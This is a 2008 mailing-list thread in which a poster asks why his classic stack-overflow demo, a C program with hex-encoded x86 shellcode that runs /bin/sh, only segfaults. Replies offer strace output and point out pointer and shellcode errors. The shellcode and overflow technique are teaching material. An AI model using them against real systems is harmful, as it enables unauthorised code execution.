buffer overflow

buffer overflow

[Varun Chandramohan]

Hi all,

             Can someone tell me whats is wrong with this program? All i
get is seg fault. Iam trying to create a stack overflow and exec a
shell. Somehow its not working. The system is x86 on linux.
gcc (GCC) 4.1.1 20070105 (Red Hat 4.1.1-52)
Copyright (C) 2006 Free Software Foundation, Inc.
This is free software; see the source for copying conditions.  There is NO
warranty; not even for MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.



The Code:
#include <stdio.h>
#include <string.h>

char shellcode[] =
        "\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b"
        "\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd"
        "\x80\xe8\xdc\xff\xff\xff/bin/sh";
#if 0
char shellcode[] =
        "\xeb\x2a\x5e\x89\x76\x08\xc6\x46\x07\x00\xc7\x46\x0c\x00\x00\x00"
        "\x00\xb8\x0b\x00\x00\x00\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80"
        "\xb8\x01\x00\x00\x00\xbb\x00\x00\x00\x00\xcd\x80\xe8\xd1\xff\xff"
        "\xff\x2f\x62\x69\x6e\x2f\x73\x68\x00\x89\xec\x5d\xc3";

#endif

char large_string[128];
int main() {
  char buffer[96];
  int i;
  long *long_ptr = (long *) large_string;
  memset(&buffer,0,sizeof(buffer));

  for (i = 0; i < 32; i++)
    *(long_ptr + i) =  (long)&buffer;

  for (i = 0; i < strlen(shellcode); i++)
    large_string[i] = shellcode[i];

  strcpy(buffer,large_string);
}

Re: buffer overflow

[Patrik Båt, RTL]

Hello, there was a long time since I coded some C, but maybe here is
some help:

strace ./test <-- use STRACE to see some more detail... 


Here is proboby your error...
----- CODE -----
  for (i = 0; i < 32; i++)
    *(long_ptr + i) =  (long)&buffer;
----- /CODE -----


----- strace -----
execve("./test", ["./test"], [/* 36 vars */]) = 0
brk(0)                                  = 0x804a000
access("/etc/ld.so.nohwcap", F_OK)      = -1 ENOENT (No such file or
directory)
mmap2(NULL, 8192, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1,
0) = 0xb7f4c000
access("/etc/ld.so.preload", R_OK)      = -1 ENOENT (No such file or
directory)
open("/etc/ld.so.cache", O_RDONLY)      = 3
fstat64(3, {st_mode=S_IFREG|0644, st_size=59381, ...}) = 0
mmap2(NULL, 59381, PROT_READ, MAP_PRIVATE, 3, 0) = 0xb7f3d000
close(3)                                = 0
access("/etc/ld.so.nohwcap", F_OK)      = -1 ENOENT (No such file or
directory)
open("/lib/i686/cmov/libc.so.6", O_RDONLY) = 3
read(3, "\177ELF\1\1\1\0\0\0\0\0\0\0\0\0\3\0\3\0\1\0\0\0\300e\1"...,
512) = 512
fstat64(3, {st_mode=S_IFREG|0755, st_size=1413540, ...}) = 0
mmap2(NULL, 1418864, PROT_READ|PROT_EXEC, MAP_PRIVATE|MAP_DENYWRITE, 3,
0) = 0xb7de2000
mmap2(0xb7f37000, 12288, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|
MAP_DENYWRITE, 3, 0x155) = 0xb7f37000
mmap2(0xb7f3a000, 9840, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|
MAP_ANONYMOUS, -1, 0) = 0xb7f3a000
close(3)                                = 0
mmap2(NULL, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1,
0) = 0xb7de1000
set_thread_area({entry_number:-1 -> 6, base_addr:0xb7de16b0,
limit:1048575, seg_32bit:1, contents:0, read_exec_only:0,
limit_in_pages:1, seg_not_present:0, useable:1}) = 0
mprotect(0xb7f37000, 4096, PROT_READ)   = 0
munmap(0xb7f3d000, 59381)               = 0
--- SIGSEGV (Segmentation fault) @ 0 (0) ---
+++ killed by SIGSEGV +++
Process 28060 detached

------ /strace ------


Kind regards Patrik BÃ¥t

tis 2008-03-11 klockan 11:38 +0530 skrev Varun Chandramohan:
> Hi all,
> 
>              Can someone tell me whats is wrong with this program? All i
> get is seg fault. Iam trying to create a stack overflow and exec a
> shell. Somehow its not working. The system is x86 on linux.
> gcc (GCC) 4.1.1 20070105 (Red Hat 4.1.1-52)
> Copyright (C) 2006 Free Software Foundation, Inc.
> This is free software; see the source for copying conditions.  There is NO
> warranty; not even for MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.
> 
> 
> 
> The Code:
> #include <stdio.h>
> #include <string.h>
> 
> char shellcode[] =
>         "\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b"
>         "\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd"
>         "\x80\xe8\xdc\xff\xff\xff/bin/sh";
> #if 0
> char shellcode[] =
>         "\xeb\x2a\x5e\x89\x76\x08\xc6\x46\x07\x00\xc7\x46\x0c\x00\x00\x00"
>         "\x00\xb8\x0b\x00\x00\x00\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80"
>         "\xb8\x01\x00\x00\x00\xbb\x00\x00\x00\x00\xcd\x80\xe8\xd1\xff\xff"
>         "\xff\x2f\x62\x69\x6e\x2f\x73\x68\x00\x89\xec\x5d\xc3";
> 
> #endif
> 
> char large_string[128];
> int main() {
>   char buffer[96];
>   int i;
>   long *long_ptr = (long *) large_string;
>   memset(&buffer,0,sizeof(buffer));
> 
>   for (i = 0; i < 32; i++)
>     *(long_ptr + i) =  (long)&buffer;
> 
>   for (i = 0; i < strlen(shellcode); i++)
>     large_string[i] = shellcode[i];
> 
>   strcpy(buffer,large_string);
> }
> 
> --
> To unsubscribe from this list: send the line "unsubscribe linux-c-programming" in
> the body of a message to majordomo@vger.kernel.org
> More majordomo info at  http://vger.kernel.org/majordomo-info.html

--
To unsubscribe from this list: send the line "unsubscribe linux-c-programming" in
the body of a message to majordomo@vger.kernel.org
More majordomo info at  http://vger.kernel.org/majordomo-info.html

Re: buffer overflow

[Patrik Båt, RTL]

tis 2008-03-11 klockan 11:38 +0530 skrev Varun Chandramohan:
> Hi all,
> 
>              Can someone tell me whats is wrong with this program? All i
> get is seg fault. Iam trying to create a stack overflow and exec a
> shell. Somehow its not working. The system is x86 on linux.
> gcc (GCC) 4.1.1 20070105 (Red Hat 4.1.1-52)
> Copyright (C) 2006 Free Software Foundation, Inc.
> This is free software; see the source for copying conditions.  There is NO
> warranty; not even for MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.
> 
> 
> 
> The Code:
> #include <stdio.h>
> #include <string.h>
> 
> char shellcode[] =
>         "\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b"
>         "\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd"
>         "\x80\xe8\xdc\xff\xff\xff/bin/sh";
> #if 0
> char shellcode[] =
>         "\xeb\x2a\x5e\x89\x76\x08\xc6\x46\x07\x00\xc7\x46\x0c\x00\x00\x00"
>         "\x00\xb8\x0b\x00\x00\x00\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80"
>         "\xb8\x01\x00\x00\x00\xbb\x00\x00\x00\x00\xcd\x80\xe8\xd1\xff\xff"
>         "\xff\x2f\x62\x69\x6e\x2f\x73\x68\x00\x89\xec\x5d\xc3";
> 
> #endif
> 
> char large_string[128];
> int main() {
>   char buffer[96];
>   int i;
>   long *long_ptr = (long *) large_string;
>   memset(&buffer,0,sizeof(buffer));
> 
>   for (i = 0; i < 32; i++)
>     *(long_ptr + i) =  (long)&buffer;
> 
>   for (i = 0; i < strlen(shellcode); i++)
>     large_string[i] = shellcode[i];
> 
>   strcpy(buffer,large_string);
strcpy(large_string,buffer);

//This is working tho...
> }
> 
> --
> To unsubscribe from this list: send the line "unsubscribe linux-c-programming" in
> the body of a message to majordomo@vger.kernel.org
> More majordomo info at  http://vger.kernel.org/majordomo-info.html

Re: buffer overflow

[Varun Chandramohan]

Patrik Båt wrote:
> tis 2008-03-11 klockan 11:38 +0530 skrev Varun Chandramohan:
>   
>> Hi all,
>>
>>              Can someone tell me whats is wrong with this program? All i
>> get is seg fault. Iam trying to create a stack overflow and exec a
>> shell. Somehow its not working. The system is x86 on linux.
>> gcc (GCC) 4.1.1 20070105 (Red Hat 4.1.1-52)
>> Copyright (C) 2006 Free Software Foundation, Inc.
>> This is free software; see the source for copying conditions.  There is NO
>> warranty; not even for MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.
>>
>>
>>
>> The Code:
>> #include <stdio.h>
>> #include <string.h>
>>
>> char shellcode[] =
>>         "\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b"
>>         "\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd"
>>         "\x80\xe8\xdc\xff\xff\xff/bin/sh";
>> #if 0
>> char shellcode[] =
>>         "\xeb\x2a\x5e\x89\x76\x08\xc6\x46\x07\x00\xc7\x46\x0c\x00\x00\x00"
>>         "\x00\xb8\x0b\x00\x00\x00\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80"
>>         "\xb8\x01\x00\x00\x00\xbb\x00\x00\x00\x00\xcd\x80\xe8\xd1\xff\xff"
>>         "\xff\x2f\x62\x69\x6e\x2f\x73\x68\x00\x89\xec\x5d\xc3";
>>
>> #endif
>>
>> char large_string[128];
>> int main() {
>>   char buffer[96];
>>   int i;
>>   long *long_ptr = (long *) large_string;
>>   memset(&buffer,0,sizeof(buffer));
>>
>>   for (i = 0; i < 32; i++)
>>     *(long_ptr + i) =  (long)&buffer;
>>
>>   for (i = 0; i < strlen(shellcode); i++)
>>     large_string[i] = shellcode[i];
>>
>>   strcpy(buffer,large_string);
>>     
> strcpy(large_string,buffer);
>
> //This is working tho...
>   
Thanks for the reply, but this doesnt spawn a shell, does it? This
simply avoids the sigsegv
>> }
>>
>> --
>> To unsubscribe from this list: send the line "unsubscribe linux-c-programming" in
>> the body of a message to majordomo@vger.kernel.org
>> More majordomo info at  http://vger.kernel.org/majordomo-info.html
>>     
>
> --
> To unsubscribe from this list: send the line "unsubscribe linux-c-programming" in
> the body of a message to majordomo@vger.kernel.org
> More majordomo info at  http://vger.kernel.org/majordomo-info.html
>   

--
To unsubscribe from this list: send the line "unsubscribe linux-c-programming" in
the body of a message to majordomo@vger.kernel.org
More majordomo info at  http://vger.kernel.org/majordomo-info.html

Re: buffer overflow

[Patrik Båt, RTL]

Yeah, maybe some hardcore c coder in here can help you more...

My primary "tip of the day" was strace ;)


tis 2008-03-11 klockan 16:11 +0530 skrev Varun Chandramohan:
> Patrik B책t wrote:
> > tis 2008-03-11 klockan 11:38 +0530 skrev Varun Chandramohan:
> >   
> >> Hi all,
> >>
> >>              Can someone tell me whats is wrong with this program? All i
> >> get is seg fault. Iam trying to create a stack overflow and exec a
> >> shell. Somehow its not working. The system is x86 on linux.
> >> gcc (GCC) 4.1.1 20070105 (Red Hat 4.1.1-52)
> >> Copyright (C) 2006 Free Software Foundation, Inc.
> >> This is free software; see the source for copying conditions.  There is NO
> >> warranty; not even for MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.
> >>
> >>
> >>
> >> The Code:
> >> #include <stdio.h>
> >> #include <string.h>
> >>
> >> char shellcode[] =
> >>         "\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b"
> >>         "\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd"
> >>         "\x80\xe8\xdc\xff\xff\xff/bin/sh";
> >> #if 0
> >> char shellcode[] =
> >>         "\xeb\x2a\x5e\x89\x76\x08\xc6\x46\x07\x00\xc7\x46\x0c\x00\x00\x00"
> >>         "\x00\xb8\x0b\x00\x00\x00\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80"
> >>         "\xb8\x01\x00\x00\x00\xbb\x00\x00\x00\x00\xcd\x80\xe8\xd1\xff\xff"
> >>         "\xff\x2f\x62\x69\x6e\x2f\x73\x68\x00\x89\xec\x5d\xc3";
> >>
> >> #endif
> >>
> >> char large_string[128];
> >> int main() {
> >>   char buffer[96];
> >>   int i;
> >>   long *long_ptr = (long *) large_string;
> >>   memset(&buffer,0,sizeof(buffer));
> >>
> >>   for (i = 0; i < 32; i++)
> >>     *(long_ptr + i) =  (long)&buffer;
> >>
> >>   for (i = 0; i < strlen(shellcode); i++)
> >>     large_string[i] = shellcode[i];
> >>
> >>   strcpy(buffer,large_string);
> >>     
> > strcpy(large_string,buffer);
> >
> > //This is working tho...
> >   
> Thanks for the reply, but this doesnt spawn a shell, does it? This
> simply avoids the sigsegv
> >> }
> >>
> >> --
> >> To unsubscribe from this list: send the line "unsubscribe linux-c-programming" in
> >> the body of a message to majordomo@vger.kernel.org
> >> More majordomo info at  http://vger.kernel.org/majordomo-info.html
> >>     
> >
> > --
> > To unsubscribe from this list: send the line "unsubscribe linux-c-programming" in
> > the body of a message to majordomo@vger.kernel.org
> > More majordomo info at  http://vger.kernel.org/majordomo-info.html
> >   
> 
> --
> To unsubscribe from this list: send the line "unsubscribe linux-c-programming" in
> the body of a message to majordomo@vger.kernel.org
> More majordomo info at  http://vger.kernel.org/majordomo-info.html
-- 
Med v채nlig h채lsning / Best regards

RTL CODEHACK
Netfilter Firewall

http://rtl.codehack.se

Patrik B책t
Email rtl@codehack.se
Phone +46 85 59 23 751
Cell  +46 70 78 22 540


--
To unsubscribe from this list: send the line "unsubscribe linux-c-programming" in
the body of a message to majordomo@vger.kernel.org
More majordomo info at  http://vger.kernel.org/majordomo-info.html

Re: buffer overflow

[ninjaboy]

2008/3/11, Patrik Båt, RTL <rtl@codehack.se>:
> Yeah, maybe some hardcore c coder in here can help you more...
>
>  My primary "tip of the day" was strace ;)
>
>
>  tis 2008-03-11 klockan 16:11 +0530 skrev Varun Chandramohan:
>  > Patrik Båt wrote:
>  > > tis 2008-03-11 klockan 11:38 +0530 skrev Varun Chandramohan:
>  > >
>  > >> Hi all,
>  > >>
>  > >>              Can someone tell me whats is wrong with this program? All i
>  > >> get is seg fault. Iam trying to create a stack overflow and exec a
>  > >> shell. Somehow its not working. The system is x86 on linux.
>  > >> gcc (GCC) 4.1.1 20070105 (Red Hat 4.1.1-52)
>  > >> Copyright (C) 2006 Free Software Foundation, Inc.
>  > >> This is free software; see the source for copying conditions.  There is NO
>  > >> warranty; not even for MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.
>  > >>
>  > >>
>  > >>
>  > >> The Code:
>  > >> #include <stdio.h>
>  > >> #include <string.h>
>  > >>
>  > >> char shellcode[] =
>  > >>         "\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b"
>  > >>         "\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd"
>  > >>         "\x80\xe8\xdc\xff\xff\xff/bin/sh";
>  > >> #if 0
>  > >> char shellcode[] =
>  > >>         "\xeb\x2a\x5e\x89\x76\x08\xc6\x46\x07\x00\xc7\x46\x0c\x00\x00\x00"
>  > >>         "\x00\xb8\x0b\x00\x00\x00\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80"
>  > >>         "\xb8\x01\x00\x00\x00\xbb\x00\x00\x00\x00\xcd\x80\xe8\xd1\xff\xff"
>  > >>         "\xff\x2f\x62\x69\x6e\x2f\x73\x68\x00\x89\xec\x5d\xc3";
>  > >>
>  > >> #endif
>  > >>
>  > >> char large_string[128];
>  > >> int main() {
>  > >>   char buffer[96];
>  > >>   int i;
>  > >>   long *long_ptr = (long *) large_string;
>  > >>   memset(&buffer,0,sizeof(buffer));
>  > >>
>  > >>   for (i = 0; i < 32; i++)
>  > >>     *(long_ptr + i) =  (long)&buffer;
>  > >>
>  > >>   for (i = 0; i < strlen(shellcode); i++)
>  > >>     large_string[i] = shellcode[i];
>  > >>
>  > >>   strcpy(buffer,large_string);
>  > >>
>  > > strcpy(large_string,buffer);
>  > >
>  > > //This is working tho...
>  > >
>  > Thanks for the reply, but this doesnt spawn a shell, does it? This
>  > simply avoids the sigsegv
>  > >> }

Maybe stack is not executable?

-- 
noone is alone.
--
To unsubscribe from this list: send the line "unsubscribe linux-c-programming" in
the body of a message to majordomo@vger.kernel.org
More majordomo info at  http://vger.kernel.org/majordomo-info.html

Re: buffer overflow

[Varun Chandramohan]

ninjaboy wrote:
> 2008/3/11, Patrik Båt, RTL <rtl@codehack.se>:
>   
>> Yeah, maybe some hardcore c coder in here can help you more...
>>
>>  My primary "tip of the day" was strace ;)
>>
>>
>>  tis 2008-03-11 klockan 16:11 +0530 skrev Varun Chandramohan:
>>  > Patrik Båt wrote:
>>  > > tis 2008-03-11 klockan 11:38 +0530 skrev Varun Chandramohan:
>>  > >
>>  > >> Hi all,
>>  > >>
>>  > >>              Can someone tell me whats is wrong with this program? All i
>>  > >> get is seg fault. Iam trying to create a stack overflow and exec a
>>  > >> shell. Somehow its not working. The system is x86 on linux.
>>  > >> gcc (GCC) 4.1.1 20070105 (Red Hat 4.1.1-52)
>>  > >> Copyright (C) 2006 Free Software Foundation, Inc.
>>  > >> This is free software; see the source for copying conditions.  There is NO
>>  > >> warranty; not even for MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.
>>  > >>
>>  > >>
>>  > >>
>>  > >> The Code:
>>  > >> #include <stdio.h>
>>  > >> #include <string.h>
>>  > >>
>>  > >> char shellcode[] =
>>  > >>         "\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b"
>>  > >>         "\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd"
>>  > >>         "\x80\xe8\xdc\xff\xff\xff/bin/sh";
>>  > >> #if 0
>>  > >> char shellcode[] =
>>  > >>         "\xeb\x2a\x5e\x89\x76\x08\xc6\x46\x07\x00\xc7\x46\x0c\x00\x00\x00"
>>  > >>         "\x00\xb8\x0b\x00\x00\x00\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80"
>>  > >>         "\xb8\x01\x00\x00\x00\xbb\x00\x00\x00\x00\xcd\x80\xe8\xd1\xff\xff"
>>  > >>         "\xff\x2f\x62\x69\x6e\x2f\x73\x68\x00\x89\xec\x5d\xc3";
>>  > >>
>>  > >> #endif
>>  > >>
>>  > >> char large_string[128];
>>  > >> int main() {
>>  > >>   char buffer[96];
>>  > >>   int i;
>>  > >>   long *long_ptr = (long *) large_string;
>>  > >>   memset(&buffer,0,sizeof(buffer));
>>  > >>
>>  > >>   for (i = 0; i < 32; i++)
>>  > >>     *(long_ptr + i) =  (long)&buffer;
>>  > >>
>>  > >>   for (i = 0; i < strlen(shellcode); i++)
>>  > >>     large_string[i] = shellcode[i];
>>  > >>
>>  > >>   strcpy(buffer,large_string);
>>  > >>
>>  > > strcpy(large_string,buffer);
>>  > >
>>  > > //This is working tho...
>>  > >
>>  > Thanks for the reply, but this doesnt spawn a shell, does it? This
>>  > simply avoids the sigsegv
>>  > >> }
>>     
>
> Maybe stack is not executable?
>
>   
Nope, made sure it is.....removed all the execshield and ramdom vm space
protection. :)

--
To unsubscribe from this list: send the line "unsubscribe linux-c-programming" in
the body of a message to majordomo@vger.kernel.org
More majordomo info at  http://vger.kernel.org/majordomo-info.html

Re: buffer overflow

[vincent-perrier]

This is bad:
memset(&buffer,0,sizeof(buffer));
buffer is already the address of the space:
memset(buffer,0,...); is what I would do

This is bad too:
for (i = 0; i < 32; i++)
   *(long_ptr + i) =  (long)&buffer;

and most certainly does not do what you want.


On Tue, 2008-03-11 at 11:38 +0530, Varun Chandramohan wrote:
> Hi all,
> 
>              Can someone tell me whats is wrong with this program? All i
> get is seg fault. Iam trying to create a stack overflow and exec a
> shell. Somehow its not working. The system is x86 on linux.
> gcc (GCC) 4.1.1 20070105 (Red Hat 4.1.1-52)
> Copyright (C) 2006 Free Software Foundation, Inc.
> This is free software; see the source for copying conditions.  There is NO
> warranty; not even for MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.
> 
> 
> 
> The Code:
> #include <stdio.h>
> #include <string.h>
> 
> char shellcode[] =
>         "\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b"
>         "\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd"
>         "\x80\xe8\xdc\xff\xff\xff/bin/sh";
> #if 0
> char shellcode[] =
>         "\xeb\x2a\x5e\x89\x76\x08\xc6\x46\x07\x00\xc7\x46\x0c\x00\x00\x00"
>         "\x00\xb8\x0b\x00\x00\x00\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80"
>         "\xb8\x01\x00\x00\x00\xbb\x00\x00\x00\x00\xcd\x80\xe8\xd1\xff\xff"
>         "\xff\x2f\x62\x69\x6e\x2f\x73\x68\x00\x89\xec\x5d\xc3";
> 
> #endif
> 
> char large_string[128];
> int main() {
>   char buffer[96];
>   int i;
>   long *long_ptr = (long *) large_string;
>   memset(&buffer,0,sizeof(buffer));
> 
>   for (i = 0; i < 32; i++)
>     *(long_ptr + i) =  (long)&buffer;
> 
>   for (i = 0; i < strlen(shellcode); i++)
>     large_string[i] = shellcode[i];
> 
>   strcpy(buffer,large_string);
> }
> 
> --
> To unsubscribe from this list: send the line "unsubscribe linux-c-programming" in
> the body of a message to majordomo@vger.kernel.org
> More majordomo info at  http://vger.kernel.org/majordomo-info.html
> &#0;
> 

Re: buffer overflow

[Varun Chandramohan]

Alfeiks Kaänoken wrote:
> Hi,
> sigsegv is ok for your code - it's points that you tried to access to the
> non-process space - i.e. on wrong pointer address (the system don't care
> where it is).
> There are no stack overflow or something else, you can expect more
> information via debugger, but
> usually if you get a stack overflow with gdb - you can get unknown
> backtrace.
>
> BTW, could you explain your target ?
>
>   
My intention was to create a classic buffer overflow as shown in many
docs on the internet. But i believe that it doesnt work out of the box
because of all the different compiler changes. So i need to know in my
compiler how stack is organized so that i can create the overflow.
Regards,
Varun
> On 11/03/2008, Varun Chandramohan <varunc@linux.vnet.ibm.com> wrote:
>   
>> Patrik Båt wrote:
>>     
>>> tis 2008-03-11 klockan 11:38 +0530 skrev Varun Chandramohan:
>>>
>>>       
>>>> Hi all,
>>>>
>>>>              Can someone tell me whats is wrong with this program? All
>>>>         
>> i
>>     
>>>> get is seg fault. Iam trying to create a stack overflow and exec a
>>>> shell. Somehow its not working. The system is x86 on linux.
>>>> gcc (GCC) 4.1.1 20070105 (Red Hat 4.1.1-52)
>>>> Copyright (C) 2006 Free Software Foundation, Inc.
>>>> This is free software; see the source for copying conditions.  There is
>>>>         
>> NO
>>     
>>>> warranty; not even for MERCHANTABILITY or FITNESS FOR A PARTICULAR
>>>>         
>> PURPOSE.
>>     
>>>>
>>>> The Code:
>>>> #include <stdio.h>
>>>> #include <string.h>
>>>>
>>>> char shellcode[] =
>>>>
>>>>         
>> "\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b"
>>     
>> "\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd"
>>     
>>>>         "\x80\xe8\xdc\xff\xff\xff/bin/sh";
>>>> #if 0
>>>> char shellcode[] =
>>>>
>>>>         
>> "\xeb\x2a\x5e\x89\x76\x08\xc6\x46\x07\x00\xc7\x46\x0c\x00\x00\x00"
>>     
>> "\x00\xb8\x0b\x00\x00\x00\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80"
>>     
>> "\xb8\x01\x00\x00\x00\xbb\x00\x00\x00\x00\xcd\x80\xe8\xd1\xff\xff"
>>     
>>>>         "\xff\x2f\x62\x69\x6e\x2f\x73\x68\x00\x89\xec\x5d\xc3";
>>>>
>>>> #endif
>>>>
>>>> char large_string[128];
>>>> int main() {
>>>>   char buffer[96];
>>>>   int i;
>>>>   long *long_ptr = (long *) large_string;
>>>>   memset(&buffer,0,sizeof(buffer));
>>>>
>>>>   for (i = 0; i < 32; i++)
>>>>     *(long_ptr + i) =  (long)&buffer;
>>>>
>>>>   for (i = 0; i < strlen(shellcode); i++)
>>>>     large_string[i] = shellcode[i];
>>>>
>>>>   strcpy(buffer,large_string);
>>>>
>>>>         
>>> strcpy(large_string,buffer);
>>>
>>> //This is working tho...
>>>
>>>       
>> Thanks for the reply, but this doesnt spawn a shell, does it? This
>> simply avoids the sigsegv
>>
>>     
>>>> }
>>>>
>>>> --
>>>> To unsubscribe from this list: send the line "unsubscribe
>>>>         
>> linux-c-programming" in
>>     
>>>> the body of a message to majordomo@vger.kernel.org
>>>> More majordomo info at  http://vger.kernel.org/majordomo-info.html
>>>>
>>>>         
>>> --
>>> To unsubscribe from this list: send the line "unsubscribe
>>>       
>> linux-c-programming" in
>>     
>>> the body of a message to majordomo@vger.kernel.org
>>> More majordomo info at  http://vger.kernel.org/majordomo-info.html
>>>
>>>       
>> --
>> To unsubscribe from this list: send the line "unsubscribe
>> linux-c-programming" in
>> the body of a message to majordomo@vger.kernel.org
>> More majordomo info at  http://vger.kernel.org/majordomo-info.html
>>
>>     
>
>
>
>   

--
To unsubscribe from this list: send the line "unsubscribe linux-c-programming" in
the body of a message to majordomo@vger.kernel.org
More majordomo info at  http://vger.kernel.org/majordomo-info.html

Re: buffer overflow

[Varun Chandramohan]

vincent-perrier wrote:
> This is bad:
> memset(&buffer,0,sizeof(buffer));
> buffer is already the address of the space:
> memset(buffer,0,...); is what I would do
>
>   
fine.
> This is bad too:
> for (i = 0; i < 32; i++)
>    *(long_ptr + i) =  (long)&buffer;
>
> and most certainly does not do what you want.
>
>   
can you suggest something better to achieve this?
> On Tue, 2008-03-11 at 11:38 +0530, Varun Chandramohan wrote:
>   
>> Hi all,
>>
>>              Can someone tell me whats is wrong with this program? All i
>> get is seg fault. Iam trying to create a stack overflow and exec a
>> shell. Somehow its not working. The system is x86 on linux.
>> gcc (GCC) 4.1.1 20070105 (Red Hat 4.1.1-52)
>> Copyright (C) 2006 Free Software Foundation, Inc.
>> This is free software; see the source for copying conditions.  There is NO
>> warranty; not even for MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.
>>
>>
>>
>> The Code:
>> #include <stdio.h>
>> #include <string.h>
>>
>> char shellcode[] =
>>         "\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b"
>>         "\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd"
>>         "\x80\xe8\xdc\xff\xff\xff/bin/sh";
>> #if 0
>> char shellcode[] =
>>         "\xeb\x2a\x5e\x89\x76\x08\xc6\x46\x07\x00\xc7\x46\x0c\x00\x00\x00"
>>         "\x00\xb8\x0b\x00\x00\x00\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80"
>>         "\xb8\x01\x00\x00\x00\xbb\x00\x00\x00\x00\xcd\x80\xe8\xd1\xff\xff"
>>         "\xff\x2f\x62\x69\x6e\x2f\x73\x68\x00\x89\xec\x5d\xc3";
>>
>> #endif
>>
>> char large_string[128];
>> int main() {
>>   char buffer[96];
>>   int i;
>>   long *long_ptr = (long *) large_string;
>>   memset(&buffer,0,sizeof(buffer));
>>
>>   for (i = 0; i < 32; i++)
>>     *(long_ptr + i) =  (long)&buffer;
>>
>>   for (i = 0; i < strlen(shellcode); i++)
>>     large_string[i] = shellcode[i];
>>
>>   strcpy(buffer,large_string);
>> }
>>
>> --
>> To unsubscribe from this list: send the line "unsubscribe linux-c-programming" in
>> the body of a message to majordomo@vger.kernel.org
>> More majordomo info at  http://vger.kernel.org/majordomo-info.html
>> &#0;
>>
>>     
>
>   

Re: buffer overflow

[nai.xia]

----- Forwarded message from nai.xia@gmail.com -----

Date: Mon, 17 Mar 2008 16:19:40 +0800
From: nai.xia@gmail.com
Subject: Re: buffer overflow
To: Varun Chandramohan <varunc@linux.vnet.ibm.com>

I think there are three errors in your testing program. 


On Tue, Mar 11, 2008 at 11:38:38AM +0530, Varun Chandramohan wrote:
> Hi all,
> 
>              Can someone tell me whats is wrong with this program? All i
> get is seg fault. Iam trying to create a stack overflow and exec a
> shell. Somehow its not working. The system is x86 on linux.
> gcc (GCC) 4.1.1 20070105 (Red Hat 4.1.1-52)
> Copyright (C) 2006 Free Software Foundation, Inc.
> This is free software; see the source for copying conditions.  There is NO
> warranty; not even for MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.
> 
> 
> 
> The Code:
> #include <stdio.h>
> #include <string.h>
> 
> char shellcode[] =
>         "\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b"
>         "\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd"
>         "\x80\xe8\xdc\xff\xff\xff/bin/sh";

I disassembled the shellcode and I don't think it is valid.

> #if 0
> char shellcode[] =
>         "\xeb\x2a\x5e\x89\x76\x08\xc6\x46\x07\x00\xc7\x46\x0c\x00\x00\x00"
>         "\x00\xb8\x0b\x00\x00\x00\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80"
>         "\xb8\x01\x00\x00\x00\xbb\x00\x00\x00\x00\xcd\x80\xe8\xd1\xff\xff"
